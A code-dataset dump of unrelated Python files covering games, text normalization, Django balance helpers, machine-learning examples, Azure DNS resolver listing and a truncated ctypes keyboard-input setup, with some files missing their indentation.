delta = ship.pos - self.pos
sm = delta.sqr_magnitude()
if sm < FLEET_SEPARATION_MAX ** 2:
target_vector -= (delta.normalized() * (FLEET_SEPARATION_DEGRADE / sm)) * FLEET_SEPARATION_POWER
# Proximity
center = V2(0,0)
for ship in fleet_ships:
center += ship.pos / len(fleet_ships)
delta = center - self.pos
target_vector += delta.normalized() * FLEET_PROXIMITY_POWER
return target_vector
def kill(self):
self.health_bar.kill()
super().kill() |
996,885 | 8ebe10b35e358eb2dcef80d741d69d3bf59ed6da | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Set de funciones para normalización de textos.
Created on Wed Aug 20 2014
Modified by analysis on Thu Aug 28 2014
Finish on (esto espera a que termine el experimento 14)
.. version: 0.2
.. release: 0.2-RC1
.. author: Abel Meneses abad
"""
import re, os
import string
LETTERS = ''.join([string.ascii_letters,'ñÑáéíóúÁÉÍÓÚüÜ'])
def url_string_recognition_support(text):
    """Replace every punctuation character inside a detected URL span with '_',
    so URLs survive later sentence/punctuation normalization as single tokens."""
    url_pattern = 'www\S*(?=[.]+?\s+?)|www\S*(?=\s+?)|http\S*(?=[.]+?\s+?)|http\S*(?=\s+?)'
    chars = list(text)
    for match in re.finditer(url_pattern, text):
        for pos in range(match.start(), match.end()):
            if chars[pos] in string.punctuation:
                chars[pos] = '_'
    return ''.join(chars)
def punctuation_filter(text):
    """Normalize punctuation, typographic, ligature, Greek, math, foreign and
    phonetic characters to plain equivalents, one re.sub pass per symbol."""
    # Punctuation-related characters
    text = re.sub('\xc2|\xa0',' ',text)
    text = re.sub('\\xe2\\x80\\x9d|\\xe2\\x80\\x9c',' ',text) # Curly double quotes (ascii byte escapes).
    text = re.sub(u'\u2022',' . ',text) # Medium-size bullet.
    text = re.sub(u'\u201c|\u201d',' ',text) # Curly double quotes (utf8).
    text = re.sub('\\xe2\\x80\\x99|\\xe2\\x80\\x98','\'',text) # Curly single quotes (ascii byte escapes).
    text = re.sub(u'\u2018|\u2019','\'',text) # Curly single quotes (unicode).
    text = re.sub('\\xe2\\x80\\x93',' - ',text) # En/em dash (ascii byte escapes).
    text = re.sub(u'\u2013|\u2014|\u2015|\u2212',' - ',text) # Long dashes (utf8).
    #~ text = re.sub('["]|[\']',' ',text) # Double and single quotes, undecoded.
    text = re.sub(u'\u25cf',' . ',text) # Large bullet.
    text = re.sub(u'\u2026','...',text) # Ellipsis.
    text = re.sub(u'\u2192','->',text) # Right arrow.
    text = re.sub(u'\u2190','<-',text) # Left arrow.
    text = re.sub(u'\u2193|\u2191|\u2195',' ',text) # Down/up arrows.
    text = re.sub(u'\u2217','*',text) # Asterisk.
    text = re.sub(u'\u200b|\u21a8',' ',text) # Zero-width space or similar.
    text = re.sub(u'\x0c','\n',text) # Form-feed control char, sometimes at the start of a heading.
    # Based on letters
    text = re.sub(u'\ufb01','fi',text) # pdf2txt ligature artifact for 'fi'
    text = re.sub(u'\ufb00|\ufb03','ff',text) # pdf2txt ligature artifact for 'ff'
    text = re.sub(u'\ufb02','fl',text) # pdf2txt ligature artifact for 'fl'
    text = re.sub(u'\ufb04','nl',text) # pdf2txt ligature artifact for 'nl'
    # TODO: more ligatures exist but do not occur in the current corpus.
    # Greek symbols
    text = re.sub(u'\u03bb','Lambda',text) # Greek letters.
    text = re.sub(u'\u03b8|\u0398','Theta',text) # Greek letters.
    text = re.sub(u'\u03bc','My',text) # Greek letters.
    text = re.sub(u'\u03b5|\u0395|\u03ad','Epsilon',text) # Greek letters.
    text = re.sub(u'\u03b1','Alfa',text) # Greek letters.
    text = re.sub(u'\u03b4|\u0394','Delta',text) # Greek letters.
    text = re.sub(u'\u03b9','Iota',text) # Greek letters.
    text = re.sub(u'\u03ba|\u039a','Kappa',text) # Greek letters.
    text = re.sub(u'\u03bd','Ny',text) # Greek letters.
    text = re.sub(u'\u03c0','Pi',text) # Greek letters.
    text = re.sub(u'\u03c1','Ro',text) # Greek letters.
    #~ text = re.sub(u'\u03c2','P',text) # Greek letters.
    text = re.sub(u'\u03c3|\u03a3','Sigma',text) # Greek letters.
    text = re.sub(u'\u03c4','Tau',text) # Greek letters.
    text = re.sub(u'\u03c5','Ipsilon',text) # Greek letters.
    text = re.sub(u'\u03c6|\u03a6','Fi',text) # Greek letters.
    text = re.sub(u'\u03c9|\u03a9','Omega',text) # Greek letters.
    text = re.sub(u'\u03cc|\u03bf','Omicron',text) # Greek letters.
    text = re.sub(u'\u03c2','Dseta',text) # Greek letters.
    # Math symbols (replacement words kept in Spanish — they are runtime output)
    text = re.sub(u'\u2260',' no-igual ',text) # Not-equal.
    text = re.sub(u'\u2229',' intersect ',text) # Intersection.
    text = re.sub(u'\u2264',' menor-o-igual ',text) # Less-or-equal.
    text = re.sub(u'\u2265',' mayor-o-igual ',text) # Greater-or-equal.
    text = re.sub(u'\u2208',' existe ',text) # Element-of.
    text = re.sub(u'\u211d',' reales ',text) # Real numbers.
    text = re.sub(u'\u2248',' aproximadamente-igual-a ',text) # Approximately-equal.
    text = re.sub(u'\u266f','#',text) # Sharp sign.
    text = re.sub(u'\u2032','-',text) # Prime / degrees.
    text = re.sub(u'\u2033','"',text) # Double prime.
    text = re.sub(u'\u2219','*',text) # Bullet operator.
    text = re.sub(u'\u2261',' congruente ',text) # Congruent.
    text = re.sub(u'\uf0ce',' en ',text) # Private-use glyph, treated as element-of.
    # Foreign chars
    text = re.sub(u'\u010d','c',text) # c with caron.
    text = re.sub(u'\u0107','c',text) # c with acute.
    text = re.sub(u'\u015b|\u0161','s',text) # s with acute/caron.
    text = re.sub(u'\u0155','r',text) # r with acute.
    text = re.sub(u'\u010c','C',text) # C with caron.
    text = re.sub(u'\u016f','u',text) # u with ring.
    text = re.sub(u'\u0141','L',text) # L with stroke.
    text = re.sub(u'\u011b','e',text) # e with caron.
    text = re.sub(u'\u0151','o',text) # o with double acute.
    # Phonetic chars
    text = re.sub(u'\u02d0','_',text) # Length mark.
    text = re.sub(u'\u0261','g',text) # Script g.
    text = re.sub(u'\u0279|\u0159','r',text) # Turned r / r with caron.
    text = re.sub(u'\u025b','e',text) # Open e.
    return text
def del_contiguous_point_support(text):
    """Blank out runs of contiguous dots (and the spaces mixed into them),
    then pad line-final dots so sentence boundaries are space-separated even
    when an acronym precedes the newline."""
    chars = list(text)
    for match in re.finditer('[.]\s*?[.]+?[\s|[.]]*', text):
        for pos in range(match.start(), match.end()):
            if chars[pos] in ('.', ' '):
                chars[pos] = ' '
    text = ''.join(chars)
    text = re.sub('[.]\s*\n',' .\n ',text)
    return text
def contiguos_string_recognition_support(text):
    """Glue intra-token punctuation into '_' and normalize dot/bracket/quote
    combinations so the sentence splitter only sees genuine sentence-final dots."""
    # Join dots/hyphens/at-signs embedded in tokens (domains, e-mails, compounds).
    text = re.sub('[.](?=\w+?)|-(?=\w+?)|@(?=\w+?)','_',text)
    # Added for Llanes; still under analysis whether it belongs here.
    text = re.sub('[.](?=,)|[.](?=\')|[.](?=;)|[.][[]|[.][]]',' ',text) # Revisit if abbreviation handling is enabled.
    text = re.sub('[.][)](?=\s*\n)|[.]["](?=[\s|)]*\n)|[.][:](?=\s*\n)','. ',text) # Revisit if replacers1 is used.
    text = re.sub('[.][)](?=\s*\w)|[.]["](?=\s*[\w)[])|[.][:](?=\s*\w)','. ',text) # Revisit if replacers1 is used.
    text = re.sub('[.][)](?=\s*[.])|[.][)](?=[,])',')',text)
    text = re.sub('[.][)](?=\s*")|[.]["](?=\s*")','. ',text)
    text = re.sub('[.]["](?=\s*[.])|[.][:](?=\s*")',' ',text)
    # Treat '?' and '!' as sentence-final dots.
    text = re.sub('[?!]','. ',text)
    #~ text = re.sub('(\w+)(?=\n)','\g?<1> .\n', text)
    return text
def abbrev_recognition_support(text):
    """Protect the dots of proper-name initials and common acronyms by
    rewriting '.' to '_' inside them, so the sentence splitter does not break
    on 'A.', 'U.S.', 'B.C.', etc.

    bug fix: the original called a bare, undefined `find(propname, frag)` —
    a NameError the first time an initial matched; use str.find instead.
    Also removed the dead commented-out acronym loop and its unused `abbrev`
    table, and fixed the garbled '50\\%' progress string.
    """
    # Single capital-letter initials recognized as proper-name abbreviations.
    propname = 'A. B. C. D. E. F. G. H. I. J. K. L. M. N. O. P. Q. R. S. T. U. V. W. X. Y. Z.'
    # Proper names acronyms
    print ('Proper names preprocessing')
    for i in re.finditer('\s[A-Z](?=[.][\s|,|\'|)])|\n[A-Z](?=[.][\s|,|\'|)])',text):
        frag = text[i.start()+1:i.end()+1]   # the letter plus its dot, e.g. "A."
        if propname.find(frag) != -1:
            frag = frag.replace('.','_')
            # Same-length splice keeps every later match position valid.
            text = text[:i.start()+1]+frag+text[i.end()+1:]
    # Well-known acronyms, with or without trailing dot.
    print ('Acronyms recognition')
    text = re.sub('U[.]S[.]|U[.]S','U_S_',text)
    text = re.sub('L[.]A[.]|L[.]A','L_A_',text)
    text = re.sub('N[.]Y[.]|N[.]Y','N_Y_',text)
    print ('50%')
    text = re.sub('B[.]C[.]|B[.]C','B_C_',text)
    text = re.sub('O[.]K[.]|O[.]K','O_K_',text)
    text = re.sub('A[.]M[.]|A[.]M|a[.]m[.]|a[.]m','a_m_',text)
    text = re.sub('A[.]I[.]|A[.]I','A_I_',text)
    # Remaining gap: an abbreviation dot at the very end of a sentence doubles
    # as the sentence-final dot by grammar rule; not handled here.
    return text
def del_char_len_one(text):
    """Remove whitespace-delimited single-character words, collapsing the
    surrounding spaces into one. Non-overlapping matches only: of two
    adjacent one-char words, only the first is removed per pass."""
    return re.sub('\s\w\s', ' ', text)
def add_text_end_dot(text):
    """Ensure the text ends with a sentence-final dot.

    Derived from the old clean-punctuation routine, reduced to the single job
    of terminating the last sentence — later processing relies on the final
    sentence ending in '.'.

    :param text: text to process.
    :type text: string.
    :returns: the text, with ' .' appended when letters follow the last dot.

    .. author: Abel Meneses abad
    """
    last_dot = text.rfind('.')        # index of the last full stop (-1 if none)
    trailing = text[last_dot + 1:]    # fragment after that dot
    # Any valid letter (LETTERS includes accented vowels and ñ) in the
    # trailing fragment means the final sentence is unterminated.
    if set(trailing) & set(LETTERS):
        text += ' .'
    return text
|
996,886 | 6777a215f3284cdb9e7d206295c53516661467bf | import inspect
import os
import shutil
import luigi
projdir_struct = {
'bin':None,
'conf':None,
'doc' :
{ 'paper': None },
'experiments' :
{ '2000-01-01-example' :
{ 'audit':None,
'bin':None,
'conf':None,
'data':None,
'doc':None,
'lib':None,
'log':None,
'raw':None,
'results':None,
'run':None,
'tmp':None }},
'lib':None,
'raw':None,
'results':None,
'src':None }
def get_file_dir():
    """Return the absolute directory containing this source file."""
    this_file = inspect.getfile(inspect.currentframe())
    return os.path.dirname(os.path.abspath(this_file))
def print_dirs(dir_structure, padding, padstep):
    """Pretty-print the nested dict as an indented directory tree.
    Python 2 only: uses the print statement and dict.iteritems."""
    if type(dir_structure) is dict:
        for k,v in dir_structure.iteritems():
            print str(' ' * padding) + k
            print_dirs(v, padding+padstep, padstep)
def create_dirs(dirtree):
    """Recursively materialize the nested dict as directories under the CWD,
    descending with os.chdir and returning with os.chdir('..') per subtree.
    Python 2 only: uses dict.iteritems."""
    if type(dirtree) is dict:
        for dir,subtree in dirtree.iteritems():
            print('Creating ' + dir + ' ...')
            os.makedirs(dir)
            if subtree is not None:
                os.chdir(dir)
                create_dirs(subtree)
                os.chdir('..')
def print_and_create_projdirs():
    """Show the project template tree, then create it under the current directory."""
    print('Now creating the following directory structure:')
    print('-'*80)
    print_dirs(projdir_struct, 0, 2)
    print('-'*80)
    create_dirs(projdir_struct)
    print('-'*80)
class InitProj(luigi.Task):
    """Luigi task: create a new project directory by copying the .projtpl template."""
    projname = luigi.Parameter()  # name/path of the project directory to create
    def output(self):
        # The task is complete once the project directory exists.
        return luigi.LocalTarget(self.projname)
    def run(self):
        shutil.copytree(get_file_dir() + '/../.projtpl', self.projname)
if __name__ == '__main__':
luigi.run()
#print get_file_dir()
|
996,887 | 436d6b72eb2b0623fe5d9eb5cbd83a97e438a3ad | import math
import numpy as np
import matplotlib.pyplot as plt
def graph(formula, first, last):
    """Plot `formula` — a Python expression in the variable x — over [first, last].

    WARNING: uses eval() on the formula string; only safe for the trusted,
    locally constructed expressions this script builds itself.
    """
    x = np.linspace(first,last,100)
    # Evaluated with `x` bound to the linspace array; the result must broadcast.
    y = eval(formula)
    plt.plot(x, y)
    plt.show()
common = 0
degree = 0
data = []
numofnums = input("How many numbers are there? ")
for x in range(numofnums):
num = input("Enter the "+str((x+1))+" number: ")
data.append(num)
print data
difs = [data]
for x in range(numofnums-1):
difs.append([])
for x in range(numofnums-1):
for y in range(numofnums-1-x):
difs[x+1].append(difs[x][y+1]-difs[x][y])
print difs
for x in range(numofnums):
a = difs[x][0]
same = 0
for y in range(numofnums-x):
if difs[x][y] != a:
same = 1
if same == 0:
degree = x
break
print "The degree is "+str(degree)
degstuff = []
for x in range(degree+1):
degstuff.append([])
for x in range(degree+1):
for y in range(degree+1-x):
degstuff[x].append([])
for z in range(degree+1-x):
degstuff[x][y].append([])
for x in range(degree+1):
for y in range(degree+1):
degstuff[0][degree-x][y] = (y+1)**(x)
for x in range(degree):
for y in range(degree-x):
for z in range(degree-x):
degstuff[x+1][y][z] = degstuff[x][y][z+1]-degstuff[x][y][z]
#print degstuff
coefficients = []
for x in range(degree+1):
modco = []
if x != 0:
for y in range(x):
modco.append(coefficients[y])
for y in range(x):
modco[y] = modco[y]*(degstuff[degree-x][y][0])
modsum = sum(modco)
else:
modsum = 0
coefficients.append(((difs[degree-x][0])-modsum)/(degstuff[degree-x][x][0]))
#print coefficients[x]
print coefficients
expression = "0"
for x in range(len(coefficients)):
expression = expression+"+"+str(coefficients[x])+"*x**"+str(len(coefficients)-x-1)
print expression
graph(expression, 0, numofnums+1)
|
996,888 | d29de7d1b69180ec93bfb1e67a02f3a91f753ebe | #!/usr/bin/python3
"""number_guess.py, an implementation of the number guess task"""
__author__ = "Steve McGuire"
__contact__ = "s.mcguire@hud.ac.uk"
import random
# bug fix: randint(0, 101) is inclusive of 101, but valid guesses are capped at
# 100 — the secret could be unguessable. Also removed the debug prints that
# leaked the secret number and the guess counter.
secret_number = random.randint(0, 100)
counter = 1
while True:
    try:
        response = int(input("Please guess a number"))
        if response not in range(0, 101):
            print("Out of range")
        else:
            if response == secret_number:
                print("Well done")
                print("You took {} guesses".format(counter))
                break
            elif response > secret_number:
                print("Your guess is too high")
            else:
                print("Your guess is too low")
            counter += 1
    except ValueError:
        print("Please enter a number between zero and 100")
|
996,889 | b2d378bdcae8d24e60401dd27093d96219dc6e8f | # Jesse Nayak
# jdn4ae
# 2/22/15
# helper.py
def greeting(msg):
print(msg) |
996,890 | fe3b209f3f56de522c51dc7dbeab03f834ee370d | from models import Balances, Member, Charity, Team, TeamMemberList, Invite
from django.core.exceptions import ObjectDoesNotExist
#Gets every balance associated with the user
def getAllBalance(user):
    """Return the user's personal (team-less) Balances queryset."""
    member = Member.objects.get(user=user) #get member from current user
    balances = None
    try:
        balances = Balances.objects.all().filter(member=member, team=None)
    except ObjectDoesNotExist:
        # NOTE(review): .filter() never raises ObjectDoesNotExist (it returns an
        # empty queryset), so this handler is dead code and balances is never
        # None on return.
        pass
    return balances
#Gets the balances of a user for specific team
def getTeamBalance(user):
    """Return a list of the user's Balances, one per team they belong to
    (teams without a matching balance row are silently skipped)."""
    member = Member.objects.get(user=user) #get member from current user
    teamMemberList = member.teammemberlist_set.all()
    balances = []
    if not teamMemberList == None:
        for teamList in teamMemberList:
            team = teamList.team
            try:
                balance = Balances.objects.get(member=member, team=team)
                balances.append(balance)
            except ObjectDoesNotExist:
                # No balance row yet for this team; skip it.
                pass
    return balances
#Updates the balance for a user by charity according to the entered value
def addToBalance(member, charityname, increment):
    """Add `increment` to the member's team-less balance for a charity,
    creating the row if needed. Returns True unless increment is negative."""
    success = False
    if increment >= 0:
        try:
            b = Balances.objects.get(member=member, charity=charityname, team=None)
            b.balance += increment
            b.save()
        except ObjectDoesNotExist:
            # First donation for this charity: create the row seeded with the increment.
            b = Balances.objects.create(member=member, charity=charityname, team=None,balance=increment)
        success = True
    return success
#Updates the balance for a user by team according to the entered value
def addToTeamBalance(member, team, increment):
    """Add `increment` to the member's balance for a team (charity taken from
    the team), creating the row if needed. Returns True unless increment is negative."""
    success = False
    if increment >= 0:
        try:
            b = Balances.objects.get(member=member, team=team, charity=team.charity)
            b.balance += increment
            b.save()
        except ObjectDoesNotExist:
            # First donation for this team: create the row seeded with the increment.
            b = Balances.objects.create(member=member, team=team, charity=team.charity, balance=increment)
        success = True
    return success
|
996,891 | 527a91169240bb5d7ba72a2dc4a4b0458f020a84 | # this is a 1 line comment
"""This is
a multiple line
comment"""
print("Hello World")
name = "John Doe"
_age = "20 years old"
grade = 100
# _age = 30
location = "I'm from Philippines"
location2 = 'I\'m from Japan'
message = "My name is " + name
add = 100 + 200
print(add)
print(message)
print(name)
print(_age)
print(grade)
number = 50 + 50.5
print(number)
name = "John"
age = 20
num = "50"
convert = float(num)
msg = "My name is " + name + " I'm " + str(age) + " years old"
print(msg)
print(convert + 100) |
996,892 | aa708eb91cdda73c6c19d3bc2da8be172620cc5c | # Author: Charse
'''Support-vector regression (SVR) on the Boston housing data.

Trains three SVR models (linear, polynomial and RBF kernels) on
standardized features/targets and compares R-squared, mean squared
error and mean absolute error on a held-out test split.
'''
import numpy
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split
from sklearn.svm import SVR
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import mean_squared_error, mean_absolute_error

# Load the house-price data.
# NOTE(review): load_boston was removed in scikit-learn 1.2; this script
# requires an older scikit-learn release.
boston = load_boston()
print("boston.DESCR:", boston)
X = boston.data
y = boston.target
print("boston.data:", X)
print("boston.target:", y)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=33, test_size=0.25)
# Inspect the spread of the regression target.
print("The max target value is", numpy.max(boston.target))
print("The min target value is", numpy.min(boston.target))
print("The average target value is", numpy.mean(boston.target))
# Separate standardizers for the features and for the target.
ss_X = StandardScaler()
ss_y = StandardScaler()
# Standardize features and targets.  StandardScaler only accepts 2-D
# input, so the 1-D target vectors are reshaped to a column for scaling
# and flattened back afterwards (the original code passed the raw 1-D
# arrays, which modern scikit-learn rejects with an error).
X_train = ss_X.fit_transform(X_train)
X_test = ss_X.transform(X_test)
y_train = ss_y.fit_transform(y_train.reshape(-1, 1)).ravel()
y_test = ss_y.transform(y_test.reshape(-1, 1)).ravel()

def _to_price(y_scaled):
    """Map standardized target values back to the original price scale."""
    return ss_y.inverse_transform(numpy.asarray(y_scaled).reshape(-1, 1)).ravel()

# Linear-kernel SVR: fit on the training split, predict the test split.
linear_svr = SVR(kernel='linear')
linear_svr.fit(X_train, y_train)
linear_svr_y_predict = linear_svr.predict(X_test)
# Polynomial-kernel SVR.
poly_svr = SVR(kernel='poly')
poly_svr.fit(X_train, y_train)
poly_svr_y_predict = poly_svr.predict(X_test)
# RBF-kernel SVR.
rbf_svr = SVR(kernel='rbf')
rbf_svr.fit(X_train, y_train)
rbf_svr_y_predict = rbf_svr.predict(X_test)
# Linear kernel metrics.
print("R-squared value of linear SVR is", linear_svr.score(X_test, y_test))
print("The mean squared error of linear SVR is",
      mean_squared_error(_to_price(y_test), _to_price(linear_svr_y_predict)))
print("The mean absolute error of linear SVR is",
      mean_absolute_error(_to_price(y_test), _to_price(linear_svr_y_predict)))
# Polynomial kernel metrics.
print("R-squared value of linear Poly SVR is", poly_svr.score(X_test, y_test))
print("The mean squared error of Poly SVR is",
      mean_squared_error(_to_price(y_test), _to_price(poly_svr_y_predict)))
print("The mean absolute error of Poly SVR is",
      mean_absolute_error(_to_price(y_test), _to_price(poly_svr_y_predict)))
# RBF kernel metrics.
print("R-squared value of linear rbf SVR is", rbf_svr.score(X_test, y_test))
print("The mean squared error of rbf SVR is",
      mean_squared_error(_to_price(y_test), _to_price(rbf_svr_y_predict)))
print("The mean absolute error of rbf SVR is",
      mean_absolute_error(_to_price(y_test), _to_price(rbf_svr_y_predict)))
## Performance evaluation
'''
With the radial-basis-function kernel mapping the features non-linearly,
the SVR shows the best regression performance of the three models.
The example illustrates how much the same estimator's performance can
vary with its kernel configuration on identical data, so it is worth
trying several kernels to obtain the best predictive performance.
Kernel functions are a very useful feature technique: conceptually they
map the original features into a higher-dimensional space, hoping the
new high-dimensional features become (close to) linearly separable,
which is exactly the regime where support vector machines excel.
'''
|
996,893 | 3de5ab8587f884634a8d19943c28a3fcbe450a65 | import pygame
from chess.constants import WIDTH, HEIGHT, CELL_SIZE, BLACK, button_font, RED, GREEN
from chess.board import Board
import sys
# One-time pygame setup: window, caption and clock shared by every screen.
pygame.init()
FPS = 60  # target frame rate for clock.tick
WIN = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Chess")
clock = pygame.time.Clock()
clock.tick(FPS)
# Most recent pygame event batch; refreshed each frame by main()/menu()
# and read by button() for click detection.
events = None
def text_objects(text, font, colour, pos):
    """Render *text* with *font* in *colour* and blit it centred on *pos*."""
    global WIN
    surface = font.render(text, True, colour)
    rect = surface.get_rect(center=pos)
    WIN.blit(surface, rect)
def button(text, x, y, w, h, colour, active_colour, action=None):
    """Draw a clickable rectangle with centred *text*.

    Reads the module-global ``events`` list (refreshed by the caller
    every frame) for click detection; *action* is invoked on a
    mouse-button-up while the pointer hovers the button.
    NOTE(review): actions like main/menu start their own loops and only
    return when those loops end.
    """
    global events
    mouse = pygame.mouse.get_pos()
    # Hovered: draw the highlight rect, slightly larger than the button.
    if x + w > mouse[0] > x and y + h > mouse[1] > y:
        pygame.draw.rect(WIN, active_colour, (x-4, y-4, w+10, h+10))
        for event in events:
            if event.type == pygame.MOUSEBUTTONUP and action is not None:
                action()
    else:
        pygame.draw.rect(WIN, colour, (x, y, w, h))
    # The label is drawn whether or not the button is hovered.
    text_objects(text, button_font, BLACK, ((x + (w // 2)), (y + (h // 2))))
def quit_game():
    """Shut pygame down and terminate the interpreter."""
    pygame.quit()
    raise SystemExit
def main():
    """Run the chess game loop until quit or the game ends.

    Reads/writes the module globals WIN and events; ``done`` holds the
    board's end state (None while playing; 'cm'/'sm' as returned by
    Board.draw — presumably checkmate/stalemate, confirm in Board).
    """
    global WIN, done, events
    running = True
    done = None
    board = Board()
    while running:
        # Fetch this frame's events; button() reads the same list.
        events = pygame.event.get()
        for event in events:
            if event.type == pygame.QUIT:
                running = False
                quit_game()
            if event.type == pygame.MOUSEBUTTONUP:
                pos = pygame.mouse.get_pos()
                # Clicks above the 58px bottom bar select a board square.
                if pos[1] <= HEIGHT - 58:
                    col = pos[0] // CELL_SIZE
                    row = pos[1] // CELL_SIZE
                    board.select(row, col)
        if done is None:
            done = board.draw(WIN)
        elif done == 'cm' or done == 'sm':
            # Game over: leave this loop and fall back to the menu.
            # NOTE(review): menu() is invoked recursively here, so long
            # sessions keep nesting loops instead of returning.
            running = False
            menu()
        # Bottom bar with a restart button.
        pygame.draw.rect(WIN, BLACK, (0, HEIGHT-58, WIDTH, 58))
        button("Play again", WIDTH-120, HEIGHT-54, 100, 50, GREEN, RED, action=main)
        pygame.display.update()
def menu():
    """Show the start menu until the player starts a game or quits."""
    global WIN, events
    running = True
    done = None  # assigned but never read here; kept from the original
    while running:
        events = pygame.event.get()
        for event in events:
            if event.type == pygame.QUIT:
                running = False
                quit_game()
        WIN.fill(BLACK)
        button("Start", (WIDTH//2)-50, (HEIGHT//2)-60, 100, 50, RED, GREEN, action=main)
        button("Exit", (WIDTH//2)-50, (HEIGHT//2)+60, 100, 50, GREEN, RED, action=quit_game)
        pygame.display.update()
# Entry point: the menu is shown as soon as the module runs.
menu()
|
996,894 | 9940e52581635e4f85e53b25ea91e382f387e7de | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
def dns_resolver_list(cmd,
                      resource_group_name=None,
                      virtual_network_name=None,
                      top=None):
    """List DNS resolvers at the narrowest scope the arguments select.

    * resource group and virtual network given -> resolvers linked to
      that virtual network,
    * only resource group given -> resolvers in the resource group,
    * otherwise -> all resolvers in the subscription.

    :param top: maximum number of results to return.

    NOTE(review): as in the original code, a virtual_network_name given
    without a resource_group_name is silently ignored and the
    subscription-wide listing is returned — confirm this is intended.
    """
    from azext_dnsresolver.aaz.latest.dns_resolver import ListByVirtualNetwork, List
    args = {"top": top}
    # Condition kept semantically identical to the original
    # (`resource_group_name and virtual_network_name is not None`).
    if resource_group_name and virtual_network_name is not None:
        args["resource_group"] = resource_group_name
        args["virtual_network_name"] = virtual_network_name
        # Instantiate only the AAZ command actually used (the original
        # eagerly constructed both command objects on every call).
        return ListByVirtualNetwork(cmd.loader)(args)
    if resource_group_name:
        args["resource_group"] = resource_group_name
    return List(cmd.loader)(args)
def dns_resolver_forwarding_ruleset_list(cmd,
                                         resource_group_name=None,
                                         virtual_network_name=None,
                                         top=None):
    """List DNS forwarding rulesets at the narrowest scope selected.

    Same scoping rules as dns_resolver_list: virtual-network scope when
    both names are given, resource-group scope when only the group is
    given, otherwise subscription-wide.

    :param top: maximum number of results to return.

    NOTE(review): a virtual_network_name without a resource_group_name
    is silently ignored (original behaviour) — confirm this is intended.
    """
    from azext_dnsresolver.aaz.latest.dns_resolver.forwarding_ruleset import ListByVirtualNetwork, List
    args = {"top": top}
    # Condition kept semantically identical to the original.
    if resource_group_name and virtual_network_name is not None:
        args["resource_group"] = resource_group_name
        args["virtual_network_name"] = virtual_network_name
        # Instantiate only the AAZ command actually used (the original
        # eagerly constructed both command objects on every call).
        return ListByVirtualNetwork(cmd.loader)(args)
    if resource_group_name:
        args["resource_group"] = resource_group_name
    return List(cmd.loader)(args)
|
996,895 | 00b45fa4b6d754bbea965ca74279bdd935c661ac | #8.14
def game_info(tytuł, gatunek, **cechy):
"""Pokazuje informacje o grze."""
gra = {}
gra['Tytuł'] = tytuł
gra['Gatunek'] = gatunek
for k, v in cechy.items():
gra[k] = v
return gra
gra = game_info('LoL', 'MOBA', Wydawca='Riot Games')
print(gra)
|
996,896 | 9cf98933a0f86babe4a6647f1298b11114f55019 | ###############################################################################
# #
# Dense.py #
# J. Steiner #
# #
###############################################################################
#%%########################### LOAD DEPENDENCIES ##############################
# imports the ability to work
import numpy as np
#%%######################### DENSE LAYER DEFINITION ###########################
class Dense():
    """A fully connected (linear) layer: output = W @ x + bias.

    Gradients accumulate over successive backward() calls and are
    applied by step(); call zeroGrad() to reset them between batches.
    """

    def __init__(self, inputDims, outputDims):
        """Create a layer mapping inputDims features to outputDims.

        Weights are drawn from N(0, 1/sqrt(outputDims)) with shape
        (outputDims, inputDims); biases start as a zero column vector.
        """
        self.weights = np.random.normal(scale=outputDims ** -0.5,
                                        size=(outputDims, inputDims))
        self.bias = np.zeros((outputDims, 1))
        self.zeroGrad()

    def zeroGrad(self):
        """Reset the accumulated parameter gradients to zero."""
        self.dL_dWeights = np.zeros_like(self.weights)
        self.dL_dBias = np.zeros_like(self.bias)

    def forward(self, x):
        """Return W @ x + bias; x is cached for the backward pass."""
        self.x = x
        return np.matmul(self.weights, x) + self.bias

    def backward(self, dL_dDense):
        """Accumulate parameter gradients and return dL/dx.

        *dL_dDense* is the loss gradient w.r.t. this layer's output,
        with the activation derivative already applied by the caller.
        """
        self.dL_dWeights += np.matmul(dL_dDense, self.x.T)
        self.dL_dBias += np.sum(dL_dDense, axis=1, keepdims=True)
        # Gradient w.r.t. the layer input, to pass further back.
        return np.matmul(self.weights.T, dL_dDense)

    def step(self, learningRate, batchSize):
        """Gradient-descent update, averaging gradients over the batch."""
        rate = learningRate / batchSize
        self.weights -= rate * self.dL_dWeights
        self.bias -= rate * self.dL_dBias
|
996,897 | 4747c7f5f3f776e3e8067d685efd973ad3285e7d | import ctypes
from ctypes import wintypes
import time
# Handle to user32.dll; use_last_error=True lets ctypes capture GetLastError.
user32 = ctypes.WinDLL('user32', use_last_error=True)
# INPUT.type discriminants: which member of the INPUT union is valid.
INPUT_MOUSE = 0
INPUT_KEYBOARD = 1
INPUT_HARDWARE = 2
# KEYBDINPUT.dwFlags bits.
KEYEVENTF_EXTENDEDKEY = 0x0001
KEYEVENTF_KEYUP = 0x0002
KEYEVENTF_UNICODE = 0x0004
KEYEVENTF_SCANCODE = 0x0008
# MapVirtualKeyExW translation mode: virtual key -> scan code.
MAPVK_VK_TO_VSC = 0
# Virtual-key codes: msdn.microsoft.com/en-us/library/dd375731
VK_TAB = 0x09
VK_MENU = 0x12  # Alt
windowskey = 0x5B  # left Windows key
# C struct definitions
# wintypes has no ULONG_PTR; alias it to WPARAM, which has the same
# width on both 32- and 64-bit Windows.
wintypes.ULONG_PTR = wintypes.WPARAM
class MOUSEINPUT(ctypes.Structure):
    """ctypes mirror of the Win32 MOUSEINPUT struct (winuser.h)."""
    _fields_ = (("dx", wintypes.LONG),
                ("dy", wintypes.LONG),
                ("mouseData", wintypes.DWORD),
                ("dwFlags", wintypes.DWORD),
                ("time", wintypes.DWORD),
                ("dwExtraInfo", wintypes.ULONG_PTR))
class KEYBDINPUT(ctypes.Structure):
    """ctypes mirror of the Win32 KEYBDINPUT struct (winuser.h)."""
    _fields_ = (("wVk", wintypes.WORD),
                ("wScan", wintypes.WORD),
                ("dwFlags", wintypes.DWORD),
                ("time", wintypes.DWORD),
                ("dwExtraInfo", wintypes.ULONG_PTR))

    def __init__(self, *args, **kwds):
        super(KEYBDINPUT, self).__init__(*args, **kwds)
        # some programs use the scan code even if KEYEVENTF_SCANCODE
